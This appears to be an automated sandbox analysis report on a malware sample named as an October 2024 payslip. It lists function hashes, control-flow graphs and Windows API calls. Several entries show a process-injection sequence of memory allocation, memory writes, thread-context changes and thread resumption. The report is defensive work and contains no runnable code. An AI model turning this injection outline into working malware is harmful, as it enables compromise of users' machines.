                                                                                                            • Opcode ID: bc77d9f588c507c72b574a5de8d02bd253e38451848ba54c3583d16f511ce12b
                                                                                                            • Instruction ID: 77b4b3645a40d3c05d4fbac44c26f45a11fc271e4fd9ea518d99c7df15e42ade
                                                                                                            • Opcode Fuzzy Hash: bc77d9f588c507c72b574a5de8d02bd253e38451848ba54c3583d16f511ce12b
                                                                                                            • Instruction Fuzzy Hash: 935126B0E013498FDB18DFA9D548B9EBFF1AF48314F208559E419A73A0D7346944CB65
                                                                                                            Function 0E5834BC Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 831 e5834bc-e58355d 833 e58355f-e583569 831->833 834 e583596-e5835b6 831->834 833->834 835 e58356b-e58356d 833->835 841 e5835b8-e5835c2 834->841 842 e5835ef-e58361e 834->842 836 e58356f-e583579 835->836 837 e583590-e583593 835->837 839 e58357b 836->839 840 e58357d-e58358c 836->840 837->834 839->840 840->840 843 e58358e 840->843 841->842 844 e5835c4-e5835c6 841->844 850 e583620-e58362a 842->850 851 e583657-e583711 CreateProcessA 842->851 843->837 846 e5835c8-e5835d2 844->846 847 e5835e9-e5835ec 844->847 848 e5835d4 846->848 849 e5835d6-e5835e5 846->849 847->842 848->849 849->849 852 e5835e7 849->852 850->851 853 e58362c-e58362e 850->853 862 e58371a-e5837a0 851->862 863 e583713-e583719 851->863 852->847 855 e583630-e58363a 853->855 856 e583651-e583654 853->856 857 e58363c 855->857 858 e58363e-e58364d 855->858 856->851 857->858 858->858 860 e58364f 858->860 860->856 873 e5837b0-e5837b4 862->873 874 e5837a2-e5837a6 862->874 863->862 876 e5837c4-e5837c8 873->876 877 e5837b6-e5837ba 873->877 874->873 875 e5837a8 874->875 875->873 879 e5837d8-e5837dc 876->879 880 e5837ca-e5837ce 876->880 877->876 878 e5837bc 877->878 878->876 882 e5837ee-e5837f5 879->882 883 e5837de-e5837e4 879->883 880->879 881 e5837d0 880->881 881->879 884 e58380c 882->884 885 e5837f7-e583806 882->885 883->882 887 e58380d 884->887 885->884 887->887
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0E5836FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: be340b42789e15093fcd00a11082b78d32082cf21ce81a5945b389402aa5396f
                                                                                                            • Instruction ID: bc55e49bf3d9e0c7f3ee43742f5fb74b6de95da54a6fe6b10ab0f17f48767b89
                                                                                                            • Opcode Fuzzy Hash: be340b42789e15093fcd00a11082b78d32082cf21ce81a5945b389402aa5396f
                                                                                                            • Instruction Fuzzy Hash: A4A15BB1D002198FEB24DF68C9417EDBBF2BF48714F1489AAD858B7280DB749985CF91
                                                                                                            Function 0E5834C8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 888 e5834c8-e58355d 890 e58355f-e583569 888->890 891 e583596-e5835b6 888->891 890->891 892 e58356b-e58356d 890->892 898 e5835b8-e5835c2 891->898 899 e5835ef-e58361e 891->899 893 e58356f-e583579 892->893 894 e583590-e583593 892->894 896 e58357b 893->896 897 e58357d-e58358c 893->897 894->891 896->897 897->897 900 e58358e 897->900 898->899 901 e5835c4-e5835c6 898->901 907 e583620-e58362a 899->907 908 e583657-e583711 CreateProcessA 899->908 900->894 903 e5835c8-e5835d2 901->903 904 e5835e9-e5835ec 901->904 905 e5835d4 903->905 906 e5835d6-e5835e5 903->906 904->899 905->906 906->906 909 e5835e7 906->909 907->908 910 e58362c-e58362e 907->910 919 e58371a-e5837a0 908->919 920 e583713-e583719 908->920 909->904 912 e583630-e58363a 910->912 913 e583651-e583654 910->913 914 e58363c 912->914 915 e58363e-e58364d 912->915 913->908 914->915 915->915 917 e58364f 915->917 917->913 930 e5837b0-e5837b4 919->930 931 e5837a2-e5837a6 919->931 920->919 933 e5837c4-e5837c8 930->933 934 e5837b6-e5837ba 930->934 931->930 932 e5837a8 931->932 932->930 936 e5837d8-e5837dc 933->936 937 e5837ca-e5837ce 933->937 934->933 935 e5837bc 934->935 935->933 939 e5837ee-e5837f5 936->939 940 e5837de-e5837e4 936->940 937->936 938 e5837d0 937->938 938->936 941 e58380c 939->941 942 e5837f7-e583806 939->942 940->939 944 e58380d 941->944 942->941 944->944
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0E5836FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: a09b79ddedbccf348000223cbd6777bdc863486af7cea459855251d257ad903a
                                                                                                            • Instruction ID: ea80874b5027b44ba95453da380c1a5ce22b9fd1a8f0daa7c797e5cde9e61e39
                                                                                                            • Opcode Fuzzy Hash: a09b79ddedbccf348000223cbd6777bdc863486af7cea459855251d257ad903a
                                                                                                            • Instruction Fuzzy Hash: FF916DB1D002198FEB10DF69C9407EDBBF2BF48714F14896AD859B7280DB749985CF91
                                                                                                            Function 0130C038 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 945 130c038-130c057 947 130c083-130c087 945->947 948 130c059-130c066 call 130b350 945->948 950 130c089-130c093 947->950 951 130c09b-130c0dc 947->951 953 130c068 948->953 954 130c07c 948->954 950->951 957 130c0e9-130c0f7 951->957 958 130c0de-130c0e6 951->958 1001 130c06e call 130c2e0 953->1001 1002 130c06e call 130c2d0 953->1002 954->947 959 130c0f9-130c0fe 957->959 960 130c11b-130c11d 957->960 958->957 962 130c100-130c107 call 130b35c 959->962 963 130c109 959->963 965 130c120-130c127 960->965 961 130c074-130c076 961->954 964 130c1b8-130c278 961->964 967 130c10b-130c119 962->967 963->967 996 130c280-130c2ab GetModuleHandleW 964->996 997 130c27a-130c27d 964->997 968 130c134-130c13b 965->968 969 130c129-130c131 965->969 967->965 971 130c148-130c151 call 130b36c 968->971 972 130c13d-130c145 968->972 969->968 977 130c153-130c15b 971->977 978 130c15e-130c163 971->978 972->971 977->978 979 130c181-130c18e 978->979 980 130c165-130c16c 978->980 987 130c190-130c1ae 979->987 988 130c1b1-130c1b7 979->988 980->979 982 130c16e-130c17e call 130b37c call 130b38c 980->982 982->979 987->988 998 130c2b4-130c2c8 996->998 999 130c2ad-130c2b3 996->999 997->996 999->998 1001->961 1002->961
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0130C29E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677851766.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1300000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 1ee6ea0450f1c9e19cc751901abd385957011cda705fb1db049dc943f4054502
                                                                                                            • Instruction ID: 1d41026849fcadb77861ab0082c109a45354d4b839c37eeda0b5ad0093a6d831
                                                                                                            • Opcode Fuzzy Hash: 1ee6ea0450f1c9e19cc751901abd385957011cda705fb1db049dc943f4054502
                                                                                                            • Instruction Fuzzy Hash: F4815870A00B058FD726DF29D45475ABBF1FF88304F108A6DD48AD7A90D735E945CB90
                                                                                                            Function 01305905 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1113 1305905-1305906 1114 130590d-13059d1 CreateActCtxA 1113->1114 1116 13059d3-13059d9 1114->1116 1117 13059da-1305a34 1114->1117 1116->1117 1124 1305a43-1305a47 1117->1124 1125 1305a36-1305a39 1117->1125 1126 1305a58 1124->1126 1127 1305a49-1305a55 1124->1127 1125->1124 1129 1305a59 1126->1129 1127->1126 1129->1129
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 013059C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677851766.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1300000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: d53643fc481729f14e21d70c90b70b4d9d8b7aa2104bf0aba8c978d83fec0492
                                                                                                            • Instruction ID: 94b6e71e6bbe026c56b65d036aa407eabd1191c6c5c5bfebe33bcc40cbef747f
                                                                                                            • Opcode Fuzzy Hash: d53643fc481729f14e21d70c90b70b4d9d8b7aa2104bf0aba8c978d83fec0492
                                                                                                            • Instruction Fuzzy Hash: 4241E2B0C00759CEDB25DFA9C884BDDBBF5BF49308F20806AD409AB291DB75694ACF50
                                                                                                            Function 013044E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1130 13044e4-13059d1 CreateActCtxA 1133 13059d3-13059d9 1130->1133 1134 13059da-1305a34 1130->1134 1133->1134 1141 1305a43-1305a47 1134->1141 1142 1305a36-1305a39 1134->1142 1143 1305a58 1141->1143 1144 1305a49-1305a55 1141->1144 1142->1141 1146 1305a59 1143->1146 1144->1143 1146->1146
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 013059C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677851766.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1300000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: 91ab004ad7b173a926e9d8a5eab8bee0b358ca730928982b73a684776102aae7
                                                                                                            • Instruction ID: 2e076a326f1355495055a09a9a250f9b83cc4d32addee8a05adefc58093de6ef
                                                                                                            • Opcode Fuzzy Hash: 91ab004ad7b173a926e9d8a5eab8bee0b358ca730928982b73a684776102aae7
                                                                                                            • Instruction Fuzzy Hash: AD41D2B0C0075DCBDB25DFA9C844B9EBBF5BF49318F20806AD409AB291DB756949CF90
                                                                                                            Function 074A0BD8 Relevance: 1.6, APIs: 1, Instructions: 84windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 074A0C97
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFromIconResource
                                                                                                            • String ID:
                                                                                                            • API String ID: 3668623891-0
                                                                                                            • Opcode ID: 6a899a50c8331e51a48668af759f44e7dacc746886931487d288f6f5aacaa056
                                                                                                            • Instruction ID: 97da22d516a341be56efe3228b4cd878062123e50cdec2fa0b30d06795c39bb7
                                                                                                            • Opcode Fuzzy Hash: 6a899a50c8331e51a48668af759f44e7dacc746886931487d288f6f5aacaa056
                                                                                                            • Instruction Fuzzy Hash: E731BCB1900349AFCB11DFA9C844ADFBFF8EF09310F14845AE954A7261C3359954DFA1
                                                                                                            Function 0E583238 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0E5832D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 0616132146c02aef30132b6ce670dcf1acac3637f672449ce929c6a90e324c60
                                                                                                            • Instruction ID: adc9ed5aa5e596d8df3b059fcd74c01ce4a274d860ecb8efaba8622205dbec0d
                                                                                                            • Opcode Fuzzy Hash: 0616132146c02aef30132b6ce670dcf1acac3637f672449ce929c6a90e324c60
                                                                                                            • Instruction Fuzzy Hash: 9D217AB1D003498FDB14DFA9C885BEEBBF1FF48310F10842AE919A7241C7789954CBA0
                                                                                                            Function 0E582FF0 Relevance: 1.6, APIs: 1, Instructions: 72threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: dc92538959eb5ebfad208d4163f124026cbf42370998eff379462eab6a870193
                                                                                                            • Instruction ID: bab1b96df978c50da5b8df8aa84aa3ba5a275f2962bc1786bac0d548cce973f8
                                                                                                            • Opcode Fuzzy Hash: dc92538959eb5ebfad208d4163f124026cbf42370998eff379462eab6a870193
                                                                                                            • Instruction Fuzzy Hash: E6218BB09042488FCB10EFA9C4457DEFFF5EF89310F20846DD519A7290CA389941CB91
                                                                                                            Function 0E583240 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0E5832D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 3284240f9da5c0021bfe452d085211f43e8524044426136689f3583b2ea2dd80
                                                                                                            • Instruction ID: a5d8038cdad9a2426cd61c4f1765577bf84ad7ccf07429a870158aceb666c692
                                                                                                            • Opcode Fuzzy Hash: 3284240f9da5c0021bfe452d085211f43e8524044426136689f3583b2ea2dd80
                                                                                                            • Instruction Fuzzy Hash: CE213BB19003499FCB14DFA9C985BEEBBF5FF48310F108429E959A7241C7789954CBA4
                                                                                                            Function 0E583328 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0E5833B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: aa3d262cf9837b48910dd2b4d0bf3ad09a0282a962b60597fcb44391e40e1025
                                                                                                            • Instruction ID: 45b50de73bbe9430de9b694e00a89d200023f0b5d929dc1ef83f0efc5b4168d8
                                                                                                            • Opcode Fuzzy Hash: aa3d262cf9837b48910dd2b4d0bf3ad09a0282a962b60597fcb44391e40e1025
                                                                                                            • Instruction Fuzzy Hash: FA2127B1D002599FCB14DFA9C885AEEBBF1FF48310F50842EE518A7241CB389945DBA5
                                                                                                            Function 0E5830A1 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0E583126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: cc2c5b954aaea985841e09b6c248bccedca020220ac3f11c184c14f0deff9e60
                                                                                                            • Instruction ID: b41d82ce97f63a803c926c4cd819ae32138f5ad3ac569618003859bb0f1470cc
                                                                                                            • Opcode Fuzzy Hash: cc2c5b954aaea985841e09b6c248bccedca020220ac3f11c184c14f0deff9e60
                                                                                                            • Instruction Fuzzy Hash: 932137B1D003498FDB14DFAAC5857EEBFF1AF88324F14842ED459A7241CB789945CBA1
                                                                                                            Function 0E583330 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0E5833B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: 1d7ee2aefa1f894bfa2b294a51d3683a2b2ffe581613c4e7daed1f0f18fd3d47
                                                                                                            • Instruction ID: e8a78762347f6a47e507564aeafeb632dc6eaa4f55314908d2da2888fca75309
                                                                                                            • Opcode Fuzzy Hash: 1d7ee2aefa1f894bfa2b294a51d3683a2b2ffe581613c4e7daed1f0f18fd3d47
                                                                                                            • Instruction Fuzzy Hash: 142139B1D003499FCB10DFAAC885AEEFBF5FF48320F508429E519A7240CB389944DBA5
                                                                                                            Function 0E5830A8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0E583126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: dd57f41c73d638d48dd3f6892a0f02ef4ed2a3d46e1b577fb23936556b7bf97c
                                                                                                            • Instruction ID: 13a374354996eeb8b3db02ee02bdca47b417c0eb02ca55494b332c8ab85f9000
                                                                                                            • Opcode Fuzzy Hash: dd57f41c73d638d48dd3f6892a0f02ef4ed2a3d46e1b577fb23936556b7bf97c
                                                                                                            • Instruction Fuzzy Hash: 312137B1D003098FDB10DFAAC5857AEBBF4EF88320F108429D519A7241CB78A944CBA5
                                                                                                            Function 0130E930 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0130E9B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677851766.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1300000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: e092a76e51082f123287bdc5b1a6134f0f2aa3c2177e41cb7e02eda944f365a8
                                                                                                            • Instruction ID: a76cd43d962358f8a5c59d350cc7e17719b1302f82ff47db828ef3c66b00187e
                                                                                                            • Opcode Fuzzy Hash: e092a76e51082f123287bdc5b1a6134f0f2aa3c2177e41cb7e02eda944f365a8
                                                                                                            • Instruction Fuzzy Hash: C821E4B59002489FDB10CF9AD984ADEFFF5EB48320F14842AE918A3351C378A944CFA0
                                                                                                            Function 0E583178 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0E5831EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 3b946efaf26faab47a6b11d12a272836958d6a3c74bf6f03384911a4b8cb0068
                                                                                                            • Instruction ID: 770ec7c9665960133d29777349fc4112d7fb88d403ab72f60b35d9c84746d1d4
                                                                                                            • Opcode Fuzzy Hash: 3b946efaf26faab47a6b11d12a272836958d6a3c74bf6f03384911a4b8cb0068
                                                                                                            • Instruction Fuzzy Hash: BB116A759002498FCB14DFA9C944AEEFFF5FF88320F148419D529A7290CB359954CFA0
                                                                                                            Function 0E583180 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0E5831EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 8910c339a0d222eb1525edb3ae01fe02ceca7740f4195a058b77c18646ab4776
                                                                                                            • Instruction ID: d9804e896382acb48e73d644d75f08bf55b21cf116c71d9f6f5e37d1dde612f4
                                                                                                            • Opcode Fuzzy Hash: 8910c339a0d222eb1525edb3ae01fe02ceca7740f4195a058b77c18646ab4776
                                                                                                            • Instruction Fuzzy Hash: FD1126B19002499FCB14DFAAC845ADEFFF5EF88320F108819E519A7250CB75A954CFA1
                                                                                                            Function 0E582FF8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: c49065215bda0e2ee4a7ab8b89c15422dd879a3d7431343a94de612a09d6a11b
                                                                                                            • Instruction ID: 28ae62c6177214e7ce46a3ec8455a184ee24cdc8899c06076c06f6551cde92ad
                                                                                                            • Opcode Fuzzy Hash: c49065215bda0e2ee4a7ab8b89c15422dd879a3d7431343a94de612a09d6a11b
                                                                                                            • Instruction Fuzzy Hash: 3F1128B19003498BCB24DFAAC44579EFBF5EB88324F208419D519A7240CA75A944CB95
                                                                                                            Function 0130C238 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0130C29E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677851766.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1300000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: d3ced67c311f71c2bb905f1fe62404c72bb40ff521ce6c3fae1829b6892b5536
                                                                                                            • Instruction ID: 591ad3d07c096dceed5e6451a463d1bad87e7eab2cce52df8b2de99e1d9a8d21
                                                                                                            • Opcode Fuzzy Hash: d3ced67c311f71c2bb905f1fe62404c72bb40ff521ce6c3fae1829b6892b5536
                                                                                                            • Instruction Fuzzy Hash: 791110B5C003498FDB14DF9AC444ADEFBF8EF88324F10856AD829A7640C379A549CFA1
                                                                                                            Function 0E5856EB Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0E58574D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 8706dab551d39372515c908c4ab8a76b6f567c2e819a479f95c183d8555963a6
                                                                                                            • Instruction ID: fbbacec9c8a0c7cdbcf212e17823e95fcde029b0dd24d600cf17fa1cce933977
                                                                                                            • Opcode Fuzzy Hash: 8706dab551d39372515c908c4ab8a76b6f567c2e819a479f95c183d8555963a6
                                                                                                            • Instruction Fuzzy Hash: 4A11F2B5800349CFDB10EF99D588BEEBBF4FB58320F20841AD958A7240D375A944CFA1
                                                                                                            Function 0E5856F0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0E58574D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: baf2be5781ed2bed78dbfba01214ceef900211d9a8f7ddd16468371b6a7d965a
                                                                                                            • Instruction ID: 3cc530c093159d56d824d7d387db7b5c0e9e92beb815f5ca279637026978cdf5
                                                                                                            • Opcode Fuzzy Hash: baf2be5781ed2bed78dbfba01214ceef900211d9a8f7ddd16468371b6a7d965a
                                                                                                            • Instruction Fuzzy Hash: 0D11C2B58003499FDB10DF9AD989BDEBBF8FB48320F108419D559A7240D375A944CFA1
                                                                                                            Function 0E585780 Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0E58574D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 3bc27295995124160d21d5ae03f40a64cfb2496b01d8a3b073d2de6c2139f608
